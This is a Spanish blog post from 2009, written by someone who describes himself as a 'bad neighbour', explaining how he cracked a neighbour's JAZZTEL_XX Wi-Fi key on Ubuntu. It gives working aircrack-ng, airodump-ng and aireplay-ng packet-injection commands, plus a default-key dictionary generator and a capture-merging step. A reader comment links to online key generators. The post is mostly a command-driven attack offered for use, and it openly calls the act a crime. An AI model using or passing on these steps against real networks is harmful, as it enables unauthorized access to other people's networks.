viernes, 11 de diciembre de 2009

Hackear wifi tipo JAZZTEL_XX con Ubuntu 9.04 [testeado]

Bueno pues como mal vecino, me puse a intentar conseguir internet en mi piso compartido. Y tras un breve analisis de redes encontre una red llamada JAZZTEL_XX, y me puse a buscar información de como hackear la red (en realidad soy un lammer, que uso herramientas de otros). yo lo he realizado con la tarjeta wifi intel pro 2200 b/g (ipw2200). Aqui os dejo el manual:

En primer lugar hay que instalar las herramientas necesarias. Yo cogí las del repositorio de ubuntu:

shell#sudo apt-get install aircrack-ng gcc

Luego existe una libreria/ejecutable que realizo alguien, que realiza un diccionario con las posibles claves qeu vienen por defecto para estas redes (yo lo he usado pero no es necesario) y se encuentra en este enlace. Para hacer usio de este ejecutable realizamos lo siguiente:

shell#gcc jazzdecripter.c jazzdecripter

Para ver las redes que tienes a tu alcance realizamos lo siguiente:

shell#airodump-ng

En mi caso:

shell#airodump-ng eth1

Aqui cogemos y apuntamos el BBSID ( debe empezar por 00:1A:2B:XX:XX:XX si es de jazztel el router) y el canal en el que opera. Tras esto realizaremos el diccionario, este paso no es estrictamente necesario, pero bueno os lo pongo por si acaso.

shell#./jazzdecripter diccionario.txt

En mi caso:

shell#./jazzdecripter 00:1A:2B:XX:XX:XX JAZZTEL_XX diccionario.txt

Tras tener el objetivo comenzaremos lo que es propiamente el ataque. Lo primero que hay que realizar es capturar el trafico en un archivo, lo realizaremos con lo siguiente:

shell#airodump-ng -w archivo.cap -c --bssid 00:1A:2B:XX:XX:XX

Yo para mi caso al no haber mucho trafico de otras redes, por vagueza no puso el filtro de --bssid, y solo filtre por canal, quedo asi:

shell#airodump-ng -w jazztel -c 11 eth1

Una vez empezada la captura, la dejamos capturando, y en otra shell distinta. Realizaremos el ataque al password. Mencionaros que es necesario como mínimo con el ataque mediante diccionario tener 5 iv-s. En caso de uqe no sea un password por defecto es necesarioo para una clave de 128 unos 120000 iv-s. El comando a ejecutar en la nueva shell para el caso con el diccionario es el siguiente:

shell2#aircrack-ng -w diccionario.txt

Caso sin diccionario:

shell2#aircrack-ng

En mi caso el comando quedo asi:

shell2#aircrack-ng jazztel-01.cap -w diccionario.txt

Este comando lo dejais en background y se va usando cada 5000 ivs que recopilamos. Y una vez que encuentre la clave os la dará.


Como podeis imaginar si no hay nadie transmitiendo conseguir los paquees necesarios es un poco dificil, en mi caso habia un cliente y aun asi me costo del orden de 3 horas conseguir los necesarios iv-s para conseguir la clave de 128. Exsite una opcion qeu es la de inyectar tráfico, y es la siguiente:

shell3#aireplay-ng -3 -x 1023 -g 1000000 -b -h 00:11:22:33:44:55 -i

En mi caso seria necesario habilitar el modo monitor de la tarjeta obteniendo un nuevo interfaz por el que poder inyectar el nuevo trafico. El comando quedaria asi:

shell3#aireplay-ng -3 -x 1023 -g 1000000 -b 00:1A:2B:XX:XX:XX -h 00:11:22:33:44:55 -i rtap0 eth1


Editado: Bueno ya para terminar os pongo como unir las capturas (.cap), ya que puede ser muy tedioso esperar a conseguir los paquetes necesarios. Para ello es necesario tener instalado el paquete wireshark-common:

shell4#sudo apt-get install wireshark wireshark-common

para unir los paquetes usaremos mergecap, de la siguiente forma:

shell4#mergecap -w juntado.cap captura1.cap captura2.cap capturaX.cap


Espero que tengais suerte y no haber escrito nada con fallos. Y bueno comentar finalmente que todo lo que hagais es bajo vuestra responsabilidad cometer el delito.

1 comentario:

  1. Hay un generador de claves online para redes WLAN y Jazztel, el artículo:

    http://www.segelsoft.com/2011/02/04/generador-de-claves-online-para-jazztel_xxxx-y-wlan_xxxx/

    El generador:


    http://kz.ath.cx/wlan/

    ResponderEliminar

Esribe lo que quieras que para esto es, pero por favor, te pido que lo hagas con educacion y sin faltar al respeto